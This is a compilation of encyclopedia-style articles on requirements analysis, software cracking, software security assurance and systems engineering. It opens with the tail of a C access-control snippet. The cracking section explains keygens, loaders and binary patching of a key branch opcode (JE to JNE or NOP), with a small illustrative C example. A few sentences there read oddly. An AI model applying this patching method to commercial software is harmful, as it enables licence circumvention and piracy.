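    read_resource(&bob);     /* denied */
    return 0;
}
```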
https://en.wikipedia.org/wiki/Security_pattern
In systems engineering and software engineering, requirements analysis focuses on the tasks that determine the needs or conditions to be met by a new or altered product or project, taking account of the possibly conflicting requirements of the various stakeholders, and analyzing, documenting, validating, and managing software or system requirements.[2] Requirements analysis is critical to the success or failure of systems or software projects.[3] The requirements should be documented, actionable, measurable, testable,[4] traceable,[4] related to identified business needs or opportunities, and defined to a level of detail sufficient for system design. Conceptually, requirements analysis includes three types of activities: eliciting, analyzing, and recording requirements.[citation needed] Requirements analysis can be a long and tiring process during which many delicate psychological skills are involved. New systems change the environment and relationships between people, so it is important to identify all the stakeholders, take into account all their needs, and ensure they understand the implications of the new systems. Analysts can employ several techniques to elicit the requirements from the customer. These may include the development of scenarios (represented as user stories in agile methods), the identification of use cases, the use of workplace observation or ethnography, holding interviews or focus groups (more aptly named in this context as requirements workshops, or requirements review sessions), and creating requirements lists. Prototyping may be used to develop an example system that can be demonstrated to stakeholders. Where necessary, the analyst will employ a combination of these methods to establish the exact requirements of the stakeholders, so that a system that meets the business needs is produced.[5][6] Requirements quality can be improved through these and other methods. See Stakeholder analysis for a discussion of people or organizations (legal entities such as companies, and standards bodies) that have a valid interest in the system. They may be affected by it either directly or indirectly. A major new emphasis in the 1990s was a focus on the identification of stakeholders. It is increasingly recognized that stakeholders are not limited to the organization employing the analyst, and include other parties affected by the system. Requirements often have cross-functional implications that are unknown to individual stakeholders and often missed or incompletely defined during stakeholder interviews. These cross-functional implications can be elicited by conducting JRD (Joint Requirements Development) sessions in a controlled environment, facilitated by a trained facilitator (Business Analyst), wherein stakeholders participate in discussions to elicit requirements, analyze their details, and uncover cross-functional implications. A dedicated scribe should be present to document the discussion, freeing up the Business Analyst to lead the discussion in a direction that generates appropriate requirements that meet the session objective. JRD sessions are analogous to Joint Application Design sessions. In the former, the sessions elicit requirements that guide design, whereas the latter elicit the specific design features to be implemented in satisfaction of elicited requirements. One traditional way of documenting requirements has been contract-style requirement lists. In a complex system such requirements lists can run hundreds of pages long. An appropriate metaphor would be an extremely long shopping list.
Such lists are very much out of favor in modern analysis, as they have proved spectacularly unsuccessful at achieving their aims[citation needed], but they are still seen to this day. As an alternative to requirement lists, Agile Software Development uses user stories to suggest requirements in everyday language. Best practices take the composed list of requirements merely as clues and repeatedly ask "why?" until the actual business purposes are discovered. Stakeholders and developers can then devise tests to measure what level of each goal has been achieved thus far. Such goals change more slowly than the long list of specific but unmeasured requirements. Once a small set of critical, measured goals has been established, rapid prototyping and short iterative development phases may proceed to deliver actual stakeholder value long before the project is half over. A prototype is a computer program that exhibits a part of the properties of another computer program, allowing users to visualize an application that has not yet been constructed. A popular form of prototype is a mockup, which helps future users and other stakeholders get an idea of what the system will look like. Prototypes make it easier to make design decisions, because aspects of the application can be seen and shared before the application is built. Major improvements in communication between users and developers were often seen with the introduction of prototypes. Early views of applications led to fewer changes later and hence reduced overall costs considerably.[citation needed] Prototypes can be flat diagrams (often referred to as wireframes) or working applications using synthesized functionality. Wireframes are made in a variety of graphic design documents, and often remove all color from the design (i.e. use a greyscale color palette) in instances where the final software is expected to have a graphic design applied to it. This helps to prevent confusion as to whether the prototype represents the final visual look and feel of the application.[citation needed] A use case is a structure for documenting the functional requirements for a system, usually involving software, whether that is new or being changed. Each use case provides a set of scenarios that convey how the system should interact with a human user or another system to achieve a specific business goal. Use cases typically avoid technical jargon, preferring instead the language of the end-user or domain expert. Use cases are often co-authored by requirements engineers and stakeholders. Use cases are deceptively simple tools for describing the behavior of software or systems. A use case contains a textual description of how users are intended to work with the software or system. Use cases should not describe the internal workings of the system, nor should they explain how that system will be implemented. Instead, they show the steps needed to perform a task without sequential assumptions. Requirements specification is the synthesis of discovery findings regarding current-state business needs and the assessment of these needs to determine, and specify, what is required to meet the needs within the solution scope in focus. Discovery, analysis, and specification move the understanding from a current as-is state to a future to-be state. Requirements specification can cover the full breadth and depth of the future state to be realized, or it could target specific gaps to fill, such as priority software system bugs to fix and enhancements to make.
Given that any large business process almost always employs software and data systems and technology, requirements specification is often associated with software system builds, purchases, cloud computing strategies, embedded software in products or devices, or other technologies. The broader definition of requirements specification includes or focuses on any solution strategy or component, such as training, documentation guides, personnel, marketing strategies, equipment, supplies, etc. Requirements are categorized in several ways. The following are common categorizations of requirements that relate to technical management.[1] Business requirements are statements of business-level goals, without reference to detailed functionality. These are usually high-level (software and/or hardware) capabilities that are needed to achieve a business outcome. Customer requirements are statements of fact and assumptions that define the expectations of the system in terms of mission objectives, environment, constraints, and measures of effectiveness and suitability (MOE/MOS). The customers are those that perform the eight primary functions of systems engineering, with special emphasis on the operator as the key customer. Operational requirements will define the basic need and, at a minimum, answer basic questions about how the system will be used in operation.[1] Architectural requirements explain what has to be done by identifying the necessary systems architecture of a system. Behavioral requirements explain what has to be done by identifying the necessary behavior of a system. Functional requirements explain what has to be done by identifying the necessary task, action or activity that must be accomplished. Functional requirements analysis will be used as the top-level functions for functional analysis.[1] Non-functional requirements are requirements that specify criteria that can be used to judge the operation of a system, rather than specific behaviors. Performance requirements define the extent to which a mission or function must be executed, generally measured in terms of quantity, quality, coverage, timeliness, or readiness. During requirements analysis, performance (how well does it have to be done) requirements will be interactively developed across all identified functions based on system life cycle factors, and characterized in terms of the degree of certainty in their estimate, the degree of criticality to system success, and their relationship to other requirements.[1] Design requirements, the "build to", "code to", and "buy to" requirements for products and "how to execute" requirements for processes, are expressed in technical data packages and technical manuals.[1] Derived requirements are requirements that are implied or transformed from higher-level requirements. For example, a requirement for long range or high speed may result in a design requirement for low weight.[1] An allocated requirement is established by dividing or otherwise allocating a high-level requirement into multiple lower-level requirements. Example: a 100-pound item that consists of two subsystems might result in weight requirements of 70 pounds and 30 pounds for the two lower-level items.[1] Well-known requirements categorization models include FURPS and FURPS+, developed at Hewlett-Packard. Steve McConnell, in his book Rapid Development, details a number of ways users can inhibit requirements gathering. This may lead to the situation where user requirements keep changing even when system or product development has been started.
Engineers and developers can also cause problems during requirements analysis. One attempted solution to communications problems has been to employ specialists in business or system analysis. Techniques introduced in the 1990s, like prototyping, Unified Modeling Language (UML), use cases, and agile software development, are also intended as solutions to problems encountered with previous methods. Also, a new class of application simulation or application definition tools has entered the market. These tools are designed to bridge the communication gap between business users and the IT organization, and also to allow applications to be 'test marketed' before any code is produced.[1]
https://en.wikipedia.org/wiki/Security_Requirements_Analysis
Software cracking (known as "breaking" mostly in the 1980s[1]) is the act of removing copy protection from software.[2] Copy protection can be removed by applying a specific crack. A crack can mean any tool that enables breaking software protection, a stolen product key, or a guessed password. Cracking software generally involves circumventing licensing and usage restrictions on commercial software by illegal methods. These methods can include modifying code directly through disassembling and bit editing, sharing stolen product keys, or developing software to generate activation keys.[3] Examples of cracks are: applying a patch, or creating reverse-engineered serial number generators known as keygens, thus bypassing software registration and payments, or converting a trial/demo version of the software into fully-functioning software without paying for it.[4] Software cracking contributes to the rise of online piracy, where pirated software is distributed to end-users[2] through filesharing sites like BitTorrent, one-click hosting (OCH), or via Usenet downloads, or by downloading bundles of the original software with cracks or keygens.[4] Some of these tools are called keygen, patch, loader, or no-disc crack. A keygen is a handmade product serial number generator that often offers the ability to generate working serial numbers in your own name. A patch is a small computer program that modifies the machine code of another program. This has the advantage for a cracker of not including a large executable in a release when only a few bytes are changed.[5] A loader modifies the startup flow of a program and does not remove the protection but circumvents it.[6][7] A well-known example of a loader is a trainer used to cheat in games.[8] Fairlight pointed out in one of their .nfo files that these types of cracks are not allowed for warez scene game releases.[9][6][10] A nukewar has shown that the protection may not kick in at any point for it to be a valid crack.[11] Software cracking is closely related to reverse engineering, because the process of attacking a copy protection technology is similar to the process of reverse engineering. The distribution of cracked copies is illegal in most countries. There have been lawsuits over cracking software.[13] It might be legal to use cracked software in certain circumstances.[14] Educational resources for reverse engineering and software cracking are, however, legal and available in the form of Crackme programs. Software is inherently expensive to produce but cheap to duplicate and distribute. Therefore, software producers generally tried to implement some form of copy protection before releasing it to the market. In 1984, Laind Huntsman, the head of software development for Formaster, a software protection company, commented that "no protection system has remained uncracked by enterprising programmers for more than a few months".[2] In 2001, Dan S. Wallach, a professor from Rice University, argued that "those determined to bypass copy-protection have always found ways to do so – and always will".[15] Most of the early software crackers were computer hobbyists who often formed groups that competed against each other in the cracking and spreading of software. Breaking a new copy protection scheme as quickly as possible was often regarded as an opportunity to demonstrate one's technical superiority rather than a possibility of money-making.
Software crackers usually did not benefit materially from their actions, and their motivation was the challenge itself of removing the protection.[2] Some low-skilled hobbyists would take already cracked software and edit various unencrypted strings of text in it to change the messages a game would tell a game player, often to something considered vulgar. Uploading the altered copies on file sharing networks provided a source of laughs for adult users. The cracker groups of the 1980s started to advertise themselves and their skills by attaching animated screens known as crack intros in the software programs they cracked and released.[16] Once the technical competition had expanded from the challenges of cracking to the challenges of creating visually stunning intros, the foundations for a new subculture known as the demoscene were established. The demoscene started to separate itself from the illegal "warez scene" during the 1990s and is now regarded as a completely different subculture. Many software crackers have later grown into extremely capable software reverse engineers; the deep knowledge of assembly required in order to crack protections enables them to reverse engineer drivers, in order to port them from binary-only drivers for Windows to drivers with source code for Linux and other free operating systems. Also, because music and intros were such an integral part of gaming, the associated music formats and graphics became very popular when hardware became affordable for the home user. With the rise of the Internet, software crackers developed secretive online organizations. In the latter half of the nineties, one of the most respected sources of information about "software protection reversing" was Fravia's website. In 2017, a group of software crackers started a project to preserve Apple II software by removing the copy protection.[17] The High Cracking University (+HCU) was founded by Old Red Cracker (+ORC), considered a genius of reverse engineering and a legendary figure in Reverse Code Engineering (RCE), to advance research into RCE. He had also taught and authored many papers on the subject, and his texts are considered classics in the field and are mandatory reading for students of RCE.[18] The addition of the "+" sign in front of the nickname of a reverser signified membership in the +HCU. Amongst the students of +HCU were the top of the elite Windows reversers worldwide.[18] +HCU published a new reverse engineering problem annually, and a small number of respondents with the best replies qualified for an undergraduate position at the university.[18] +Fravia was a professor at +HCU. Fravia's website was known as "+Fravia's Pages of Reverse Engineering" and he used it to challenge programmers as well as wider society to "reverse engineer" the "brainwashing of a corrupt and rampant materialism". In its heyday, his website received millions of visitors per year and its influence was "widespread".[18] On his site, +Fravia also maintained a database of the tutorials generated by +HCU students for posterity.[19] Nowadays most of the graduates of +HCU have migrated to Linux, and few have remained as Windows reversers. The information at the university has been rediscovered by a new generation of researchers and practitioners of RCE who have started new research projects in the field.[18] The most common software crack is the modification of an application's binary to cause or prevent a specific key branch in the program's execution.
This is accomplished by reverse engineering the compiled program code using a debugger such as x64dbg, SoftICE,[20] OllyDbg, GDB, or MacsBug until the software cracker reaches the subroutine that contains the primary method of protecting the software (or by disassembling an executable file with a program such as IDA).[21] The binary is then modified using the debugger or a hex editor such as HIEW[22] or monitor in a manner that replaces a prior branching opcode with its complement or a NOP opcode, so the key branch will either always execute a specific subroutine or skip over it (a small illustration of this idea appears at the end of this section). Almost all common software cracks are a variation of this type. A region of code that must not be entered is often called a "bad boy", while one that should be followed is a "good boy".[23] Proprietary software developers are constantly developing techniques such as code obfuscation, encryption, and self-modifying code to make binary modification increasingly difficult.[24] Even with these measures being taken, developers struggle to combat software cracking. This is because it is very common for a professional to publicly release a simple cracked EXE or Retrium Installer for public download, eliminating the need for inexperienced users to crack the software themselves. A specific example of this technique is a crack that removes the expiration period from a time-limited trial of an application. These cracks are usually programs that alter the program executable and sometimes the .dll or .so files linked to the application; the process of altering the original binary files is called patching.[12] Similar cracks are available for software that requires a hardware dongle. A company can also break the copy protection of programs that they have legally purchased but that are licensed to particular hardware, so that there is no risk of downtime due to hardware failure (and, of course, no need to restrict oneself to running the software on bought hardware only). Another method is the use of special software such as CloneCD to scan for the use of a commercial copy protection application. After discovering the software used to protect the application, another tool may be used to remove the copy protection from the software on the CD or DVD. This may enable another program such as Alcohol 120%, CloneDVD, Game Jackal, or Daemon Tools to copy the protected software to a user's hard disk. Popular commercial copy protection applications which may be scanned for include SafeDisc and StarForce.[25] In other cases, it might be possible to decompile a program in order to get access to the original source code or code on a level higher than machine code. This is often possible with scripting languages and languages utilizing JIT compilation. An example is cracking (or debugging) on the .NET platform, where one might consider manipulating CIL to achieve one's needs. Java's bytecode also works in a similar fashion, in which there is an intermediate language before the program is compiled to run on the platform-dependent machine code.[26] Advanced reverse engineering for protections such as SecuROM, SafeDisc, StarForce, or Denuvo requires a cracker, or many crackers, to spend much more time studying the protection, eventually finding every flaw within the protection code, and then coding their own tools to "unwrap" the protection automatically from executable (.EXE) and library (.DLL) files.
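To make the "key branch" idea above concrete, here is a hedged C sketch of a hypothetical protection routine; the function name and check are invented for illustration. The comment notes, as general x86 background, how the single conditional-jump opcode produced by such a check is the usual patch target:

```c
#include <stdio.h>

/* Hypothetical protection routine: returns nonzero only for a valid key. */
static int key_is_valid(const char *key) {
    return key[0] == 'X';   /* stand-in for a real registration check */
}

int main(void) {
    const char *key = "bogus";
    /* The compiled comparison below ends in a single conditional jump.
       In the kind of crack described above, that one branching opcode
       (e.g., JE, 0x74 on x86) is replaced in the binary with its
       complement (JNE, 0x75) or with NOPs (0x90), so the "good boy"
       path always executes regardless of the key. */
    if (key_is_valid(key)) {
        puts("registered version");   /* "good boy" */
    } else {
        puts("invalid key");          /* "bad boy" */
    }
    return 0;
}
```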
There are a number of sites on the Internet that let users download cracks produced by warez groups for popular games and applications (although at the danger of acquiring malicious software that is sometimes distributed via such sites).[27] Although these cracks are used by legal buyers of software, they can also be used by people who have downloaded or otherwise obtained unauthorized copies (often through P2P networks). Software cracking led to the distribution of pirated software around the world (software piracy). It was estimated that the United States lost US$2.3 billion in business application software in 1996. Software piracy rates were especially prevalent in African, Asian, Eastern European, and Latin American countries. In certain countries such as Indonesia, Pakistan, Kuwait, China, and El Salvador,[28] 90% of the software used was pirated.[29]
https://en.wikipedia.org/wiki/Software_cracking
Software security assurance is a process that helps design and implement software that protects the data and resources contained in and controlled by that software. Software is itself a resource and thus must be afforded appropriate security. Software Security Assurance (SSA) is the process of ensuring that software is designed to operate at a level of security that is consistent with the potential harm that could result from the loss, inaccuracy, alteration, unavailability, or misuse of the data and resources that it uses, controls, and protects.[1] The software security assurance process begins by identifying and categorizing the information that is to be contained in, or used by, the software. The information should be categorized according to its sensitivity. For example, in the lowest category, the impact of a security violation is minimal (i.e. the impact on the software owner's mission, functions, or reputation is negligible). For a top category, however, the impact may pose a threat to human life; may have an irreparable impact on the software owner's missions, functions, image, or reputation; or may result in the loss of significant assets or resources. Once the information is categorized, security requirements can be developed. The security requirements should address access control, including network access and physical access; data management and data access; environmental controls (power, air conditioning, etc.) and off-line storage; human resource security; and audit trails and usage records. All security vulnerabilities in software are the result of security bugs, or defects, within the software. In most cases, these defects are created by two primary causes: (1) non-conformance, or a failure to satisfy requirements; and (2) an error or omission in the software requirements. A non-conformance may be simple (the most common is a coding error or defect) or more complex (i.e., a subtle timing error or input validation error). The important point about non-conformance is that verification and validation techniques are designed to detect them, and security assurance techniques are designed to prevent them. Improvements in these methods, through a software security assurance program, can improve the security of software. The most serious security problems with software-based systems are those that develop when the software requirements are incorrect, inappropriate, or incomplete for the system situation. Unfortunately, errors or omissions in requirements are more difficult to identify. For example, the software may perform exactly as required under normal use, but the requirements may not correctly deal with some system state. When the system enters this problem state, unexpected and undesirable behavior may result. This type of problem cannot be handled within the software discipline; it results from a failure of the system and software engineering processes which developed and allocated the system requirements to the software. There are two basic types of Software Security Assurance activities. Improving the software development process and building better software are ways to improve software security, by producing software with fewer defects and vulnerabilities. A first-order approach is to identify the critical software components that control security-related functions and pay special attention to them throughout the development and testing process. This approach helps to focus scarce security resources on the most critical areas.
There are many commercial off-the-shelf (COTS) software packages that are available to support software security assurance activities. However, before they are used, these tools must be carefully evaluated and their effectiveness must be assured. One way to improve software security is to gain a better understanding of the most common weaknesses that can affect software security. With that in mind, there is a current community-based program called the Common Weakness Enumeration project,[2] which is sponsored by The Mitre Corporation to identify and describe such weaknesses. The list, which is currently in a very preliminary form, contains descriptions of common software weaknesses, faults, and flaws. Security architecture/design analysis verifies that the software design correctly implements security requirements. Generally speaking, there are four basic techniques that are used for security architecture/design analysis.[3][4] Logic analysis evaluates the equations, algorithms, and control logic of the software design. Data analysis evaluates the description and intended usage of each data item used in the design of the software component. The use of interrupts and their effect on data should receive special attention to ensure interrupt handling routines do not alter critical data used by other routines. Interface analysis verifies the proper design of a software component's interfaces with other components of the system, including computer hardware, software, and end-users. Constraint analysis evaluates the design of a software component against restrictions imposed by requirements and real-world limitations. The design must be responsive to all known or anticipated restrictions on the software component. These restrictions may include timing, sizing, and throughput constraints, input and output data limitations, equation and algorithm limitations, and other design limitations. Code analysis verifies that the software source code is written correctly, implements the desired design, and does not violate any security requirements. Generally speaking, the techniques used in the performance of code analysis mirror those used in design analysis. Secure code reviews are conducted during and at the end of the development phase to determine whether established security requirements, security design concepts, and security-related specifications have been satisfied. These reviews typically consist of the presentation of material to a review group. Secure code reviews are most effective when conducted by personnel who have not been directly involved in the development of the software being reviewed. Informal secure code reviews can be conducted on an as-needed basis. To conduct an informal review, the developer simply selects one or more reviewer(s) and provides and/or presents the material to be reviewed. The material may be as informal as pseudo-code or hand-written documentation. Formal secure code reviews are conducted at the end of the development phase for each software component. The client of the software appoints the formal review group, who may make or affect a "go/no-go" decision to proceed to the next step of the software development life cycle. A secure code inspection or walkthrough is a detailed examination of a product on a step-by-step or line-by-line (of source code) basis. The purpose of conducting secure code inspections or walkthroughs is to find errors. Typically, the group that does an inspection or walkthrough is composed of peers from development, security engineering, and quality assurance.
Software security testing, which includes penetration testing, confirms the results of design and code analysis, investigates software behaviour, and verifies that the software complies with security requirements. Special security testing, conducted in accordance with a security test plan and procedures, establishes the compliance of the software with the security requirements. Security testing focuses on locating software weaknesses and identifying extreme or unexpected situations that could cause the software to fail in ways that would cause a violation of security requirements. Security testing efforts are often limited to the software requirements that are classified as "critical" security items.
https://en.wikipedia.org/wiki/Software_security_assurance
Systems engineering is an interdisciplinary field of engineering and engineering management that focuses on how to design, integrate, and manage complex systems over their life cycles. At its core, systems engineering utilizes systems thinking principles to organize this body of knowledge. The individual outcome of such efforts, an engineered system, can be defined as a combination of components that work in synergy to collectively perform a useful function. Issues such as requirements engineering, reliability, logistics, coordination of different teams, testing and evaluation, maintainability, and many other disciplines, a.k.a. "ilities", necessary for successful system design, development, implementation, and ultimate decommission become more difficult when dealing with large or complex projects. Systems engineering deals with work processes, optimization methods, and risk management tools in such projects. It overlaps technical and human-centered disciplines such as industrial engineering, production systems engineering, process systems engineering, mechanical engineering, manufacturing engineering, production engineering, control engineering, software engineering, electrical engineering, cybernetics, aerospace engineering, organizational studies, civil engineering and project management. Systems engineering ensures that all likely aspects of a project or system are considered and integrated into a whole. The systems engineering process is a discovery process that is quite unlike a manufacturing process. A manufacturing process is focused on repetitive activities that achieve high-quality outputs with minimum cost and time. The systems engineering process must begin by discovering the real problems that need to be resolved and identifying the most probable or highest-impact failures that can occur. Systems engineering involves finding solutions to these problems. The term systems engineering can be traced back to Bell Telephone Laboratories in the 1940s.[1] The need to identify and manipulate the properties of a system as a whole, which in complex engineering projects may greatly differ from the sum of the parts' properties, motivated various industries, especially those developing systems for the U.S. military, to apply the discipline.[2][3] When it was no longer possible to rely on design evolution to improve upon a system and the existing tools were not sufficient to meet growing demands, new methods began to be developed that addressed the complexity directly.[4] The continuing evolution of systems engineering comprises the development and identification of new methods and modeling techniques. These methods aid in a better comprehension of the design and developmental control of engineering systems as they grow more complex. Popular tools that are often used in the systems engineering context were developed during these times, including Universal Systems Language (USL), Unified Modeling Language (UML), Quality function deployment (QFD), and Integration Definition (IDEF). In 1990, a professional society for systems engineering, the National Council on Systems Engineering (NCOSE), was founded by representatives from a number of U.S. corporations and organizations. NCOSE was created to address the need for improvements in systems engineering practices and education.
As a result of growing involvement from systems engineers outside of the U.S., the name of the organization was changed to the International Council on Systems Engineering (INCOSE) in 1995.[5] Schools in several countries offer graduate programs in systems engineering, and continuing education options are also available for practicing engineers.[6] Systems engineering signifies only an approach and, more recently, a discipline in engineering. The aim of education in systems engineering is to formalize various approaches simply and, in doing so, identify new methods and research opportunities similar to those that occur in other fields of engineering. As an approach, systems engineering is holistic and interdisciplinary in flavor. The traditional scope of engineering embraces the conception, design, development, production, and operation of physical systems. Systems engineering, as originally conceived, falls within this scope. "Systems engineering", in this sense of the term, refers to the building of engineering concepts. The use of the term "systems engineer" has evolved over time to embrace a wider, more holistic concept of "systems" and of engineering processes. This evolution of the definition has been a subject of ongoing controversy,[13] and the term continues to apply to both the narrower and the broader scope. Traditional systems engineering was seen as a branch of engineering in the classical sense, that is, as applied only to physical systems, such as spacecraft and aircraft. More recently, systems engineering has evolved to take on a broader meaning, especially when humans are seen as an essential component of a system. Peter Checkland, for example, captures the broader meaning of systems engineering by stating that 'engineering' "can be read in its general sense; you can engineer a meeting or a political agreement".[14]: 10 Consistent with the broader scope of systems engineering, the Systems Engineering Body of Knowledge (SEBoK)[15] has defined three types of systems engineering. Systems engineering focuses on analyzing and eliciting customer needs and required functionality early in the development cycle, documenting requirements, then proceeding with design synthesis and system validation while considering the complete problem, the system lifecycle. This includes fully understanding all of the stakeholders involved. Oliver et al. claim that the systems engineering process can be decomposed into a Management Process and a Technical Process. Within Oliver's model, the goal of the Management Process is to organize the technical effort in the lifecycle, while the Technical Process includes assessing available information, defining effectiveness measures, creating a behavior model, creating a structure model, performing trade-off analysis, and creating a sequential build and test plan.[16] Although there are several models used in industry depending on their application, all of them aim to identify the relation between the various stages mentioned above and incorporate feedback. Examples of such models include the Waterfall model and the VEE model (also called the V model).[17] System development often requires contribution from diverse technical disciplines.[18] By providing a systems (holistic) view of the development effort, systems engineering helps mold all the technical contributors into a unified team effort, forming a structured development process that proceeds from concept to production to operation and, in some cases, to termination and disposal.
In an acquisition, the holistic integrative discipline combines contributions and balances tradeoffs among cost, schedule, and performance while maintaining an acceptable level of risk covering the entire life cycle of the item.[19] This perspective is often replicated in educational programs, in that systems engineering courses are taught by faculty from other engineering departments, which helps create an interdisciplinary environment.[20][21] The need for systems engineering arose with the increase in complexity of systems and projects, in turn exponentially increasing the possibility of component friction, and therefore the unreliability of the design. When speaking in this context, complexity incorporates not only engineering systems but also the logical human organization of data. At the same time, a system can become more complex due to an increase in size as well as with an increase in the amount of data, variables, or the number of fields that are involved in the design. The International Space Station is an example of such a system. The development of smarter control algorithms, microprocessor design, and analysis of environmental systems also come within the purview of systems engineering. Systems engineering encourages the use of tools and methods to better comprehend and manage complexity in systems.[22] Taking an interdisciplinary approach to engineering systems is inherently complex, since the behavior of and interaction among system components is not always immediately well defined or understood. Defining and characterizing such systems and subsystems and the interactions among them is one of the goals of systems engineering. In doing so, the gap that exists between informal requirements from users, operators, and marketing organizations, and technical specifications, is successfully bridged.[23] The principles of systems engineering – holism, emergent behavior, boundary, et al. – can be applied to any system, complex or otherwise, provided systems thinking is employed at all levels.[24] Besides defense and aerospace, many information- and technology-based companies, software development firms, and industries in the field of electronics & communications require systems engineers as part of their team.[25] An analysis by the INCOSE Systems Engineering Center of Excellence (SECOE) indicates that optimal effort spent on systems engineering is about 15–20% of the total project effort.[26] At the same time, studies have shown that systems engineering essentially leads to a reduction in costs, among other benefits.[26] However, no quantitative survey at a larger scale encompassing a wide variety of industries had been conducted until recently. Such studies are underway to determine the effectiveness and quantify the benefits of systems engineering.[27][28] Systems engineering encourages the use of modeling and simulation to validate assumptions or theories on systems and the interactions within them.[29][30] Methods that allow early detection of possible failures, as in safety engineering, are integrated into the design process. At the same time, decisions made at the beginning of a project whose consequences are not clearly understood can have enormous implications later in the life of a system, and it is the task of the modern systems engineer to explore these issues and make critical decisions. No method guarantees that today's decisions will still be valid when a system goes into service years or decades after it is first conceived.
However, there are techniques that support the process of systems engineering. Examples include soft systems methodology, Jay Wright Forrester's System dynamics method, and the Unified Modeling Language (UML), all currently being explored, evaluated, and developed to support the engineering decision process. Education in systems engineering is often seen as an extension to the regular engineering courses,[31] reflecting the industry attitude that engineering students need a foundational background in one of the traditional engineering disciplines (e.g. aerospace engineering, civil engineering, electrical engineering, mechanical engineering, manufacturing engineering, industrial engineering, chemical engineering) plus practical, real-world experience to be effective as systems engineers. Undergraduate university programs explicitly in systems engineering are growing in number but remain uncommon; degrees including such material are most often presented as a BS in Industrial Engineering. Typically, programs (either by themselves or in combination with interdisciplinary study) are offered beginning at the graduate level in both academic and professional tracks, resulting in the grant of either an MS/MEng or Ph.D./EngD degree. INCOSE, in collaboration with the Systems Engineering Research Center at Stevens Institute of Technology, maintains a regularly updated directory of worldwide academic programs at suitably accredited institutions.[6] As of 2017, it lists over 140 universities in North America offering more than 400 undergraduate and graduate programs in systems engineering. Widespread institutional acknowledgment of the field as a distinct subdiscipline is quite recent; the 2009 edition of the same publication reported the number of such schools and programs at only 80 and 165, respectively. Education in systems engineering can be taken as systems-centric or domain-centric. Both of these patterns strive to educate the systems engineer who is able to oversee interdisciplinary projects with the depth required of a core engineer.[32] Systems engineering tools are strategies, procedures, and techniques that aid in performing systems engineering on a project or product. The purpose of these tools varies, from database management, graphical browsing, simulation, and reasoning, to document production, neutral import/export, and more.[33] There are many definitions of what a system is in the field of systems engineering. Systems engineering processes encompass all creative, manual, and technical activities necessary to define the product and which need to be carried out to convert a system definition to a sufficiently detailed system design specification for product manufacture and deployment. Design and development of a system can be divided into four stages, each with different definitions.[41] Depending on the application, tools are used for the various stages of the systems engineering process.[23] Models play important and diverse roles in systems engineering. A model can be defined in several ways,[42] and together these definitions are broad enough to encompass physical engineering models used in the verification of a system design, as well as schematic models like a functional flow block diagram and mathematical (i.e. quantitative) models used in the trade study process.
This section focuses on the last of these: mathematical models.[42]

The main reason for using mathematical models and diagrams in trade studies is to provide estimates of system effectiveness, performance or technical attributes, and cost from a set of known or estimable quantities. Typically, a collection of separate models is needed to provide all of these outcome variables. The heart of any mathematical model is a set of meaningful quantitative relationships among its inputs and outputs. These relationships can be as simple as adding up constituent quantities to obtain a total, or as complex as a set of differential equations describing the trajectory of a spacecraft in a gravitational field. Ideally, the relationships express causality, not just correlation.[42] Furthermore, key to successful systems engineering activities are the methods with which these models are efficiently and effectively managed and used to simulate the systems. However, diverse domains often present recurring problems of modeling and simulation for systems engineering, and new advancements are aiming to cross-fertilize methods among distinct scientific and engineering communities, under the title of 'Modeling & Simulation-based Systems Engineering'.[43][page needed]

Initially, when the primary purpose of a systems engineer is to comprehend a complex problem, graphic representations of a system are used to communicate the system's functional and data requirements.[44] Common graphical representations include the functional flow block diagram, the data flow diagram, the N2 chart, IDEF0 diagrams, use case diagrams, and sequence diagrams. A graphical representation relates the various subsystems or parts of a system through functions, data, or interfaces. Any of these methods may be used in an industry based on its requirements. For instance, the N2 chart may be used where interfaces between systems are important. Part of the design phase is to create structural and behavioral models of the system.

Once the requirements are understood, it is the responsibility of a systems engineer to refine them and to determine, along with other engineers, the best technology for the job. At this point, starting with a trade study, systems engineering encourages the use of weighted choices to determine the best option. A decision matrix, or Pugh method, is one way (QFD is another) to make this choice while considering all the criteria that are important. The trade study in turn informs the design, which again affects the graphic representations of the system (without changing the requirements). In an SE process, this stage represents the iterative step that is carried out until a feasible solution is found. A decision matrix is often populated using techniques such as statistical analysis, reliability analysis, system dynamics (feedback control), and optimization methods.
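As a concrete illustration of the weighted decision-matrix step described above, the following sketch ranks three candidate designs. The options, criteria, weights, and scores are all invented for illustration and are not part of any standard.

```python
# Minimal weighted decision-matrix (trade study) sketch. The options,
# criteria, weights, and scores below are invented for illustration.

criteria_weights = {"cost": 0.4, "performance": 0.4, "risk": 0.2}

# Scores on a 1-9 scale, higher is better (so the "cost" and "risk"
# scores here mean "cheapness" and "low-riskiness").
options = {
    "design_a": {"cost": 7, "performance": 5, "risk": 8},
    "design_b": {"cost": 4, "performance": 9, "risk": 6},
    "design_c": {"cost": 8, "performance": 6, "risk": 4},
}

def weighted_score(scores, weights):
    return sum(weights[c] * scores[c] for c in weights)

ranked = sorted(options.items(),
                key=lambda kv: weighted_score(kv[1], criteria_weights),
                reverse=True)

for name, scores in ranked:
    print(f"{name}: {weighted_score(scores, criteria_weights):.2f}")
```

In practice the interesting output is not the winner but the sensitivity: if small changes to the weights reorder the ranking, the trade study has not yet discriminated among the options.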
Systems Modeling Language (SysML), a modeling language used for systems engineering applications, supports the specification, analysis, design, verification, and validation of a broad range of complex systems.[45] Lifecycle Modeling Language (LML) is an open-standard modeling language designed for systems engineering that supports the full lifecycle: the conceptual, utilization, support, and retirement stages.[46]

Many related fields may be considered tightly coupled to systems engineering, and the following areas have contributed to its development as a distinct entity.

Cognitive systems engineering (CSE) is a specific approach to the description and analysis of human-machine systems or sociotechnical systems.[47] The three main themes of CSE are how humans cope with complexity, how work is accomplished through the use of artifacts, and how human-machine systems and socio-technical systems can be described as joint cognitive systems. Since its beginning, CSE has become a recognized scientific discipline, sometimes also referred to as cognitive engineering. The concept of a joint cognitive system (JCS) has in particular become widely used as a way of understanding how complex socio-technical systems can be described with varying degrees of resolution. The more than 20 years of experience with CSE has been described extensively.[48][49]

Like systems engineering, configuration management as practiced in the defense and aerospace industry is a broad systems-level practice. The field parallels the taskings of systems engineering: where systems engineering deals with requirements development, allocation to development items, and verification, configuration management deals with requirements capture, traceability to the development item, and audit of the development item to ensure that it has achieved the desired functionality and outcomes that systems engineering and/or test and verification engineering have proven through objective testing.

Control engineering, with its design and implementation of control systems, used extensively in nearly every industry, is a large sub-field of systems engineering. The cruise control on an automobile and the guidance system for a ballistic missile are two examples. Control systems theory is an active field of applied mathematics involving the investigation of solution spaces and the development of new methods for the analysis of the control process.

